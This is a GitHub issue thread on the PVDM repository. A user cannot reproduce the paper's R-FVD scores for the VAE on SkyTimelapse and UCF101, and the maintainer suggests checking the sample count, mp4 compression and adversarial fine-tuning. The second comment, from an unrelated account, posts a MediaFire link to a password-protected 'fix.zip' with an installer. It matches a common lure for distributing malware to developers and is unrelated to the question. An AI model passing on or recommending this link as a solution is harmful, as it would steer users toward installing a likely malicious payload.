### ISSUE TITLE
Can not reproduce VAE R-FVD metrics on the SkyTimelapse dataset

### ISSUE THREAD

**Issue by BPAWD** [sihyun-yu/PVDM#43]
Thanks for open-sourcing the great work. However, I tried training the VAE on SkyTimelapse dataset for 150K steps but the R-FVD only get  66.79 while the reported number in the paper is 36.52. The PSNR results (32.62) is comparable as reported though. I also evalulate the provided pre-trained weight but only get 41.81 on R-FVD metrics on the test set and 13.47 on the training set, which are worse than the paper reported ( 36.52 on the test set and 7.37 on the training set).  I use the test_ifvd() funtion in evals/eval.py for inference. Any suggestion on that?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BPAWD** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

What's this use for?

**Comment by sihyun-yu** [comment]
Hi, thanks for your interest. FVD is greatly influenced by the number of videos used for videos --- did you use 2,048 samples for evaluation? For training, you might need to train the model longer and need to fine-tune it with adversarial loss.

**Comment by BPAWD** [comment]
Thanks for your prompt reply. I use 196 samples in the test set as shown in Table 4 in the paper to evaluate the released pre-trained checkpoints. For the UCF101 dataset, I also evaluated the released pre-trained checkpoint on 3783 samples in the testlist01.txt but only got  [FVD 54.556553]. Could you release the evaluation code to facilitate the following works built upon PVDM for comparison? For the adversarial loss do you mean the [d_loss](https://github.com/sihyun-yu/PVDM/blob/793172f7acbe51036a9f2c62a6d2bd1b0a0c6d90/tools/trainer.py#L207) in trainer.py? Do the hyperparameters need changes like using a smaller learning rate during training?

**Comment by sihyun-yu** [comment]
Hi, the results seem quite strange because I got the results similar to the original paper using the current evals.py. Did you save the video file (as mp4 format) and load it for evaluation? Due to the compression artifact it might affect the value a lot. For adversarial loss, yes - please refer to FAQ in the README file.
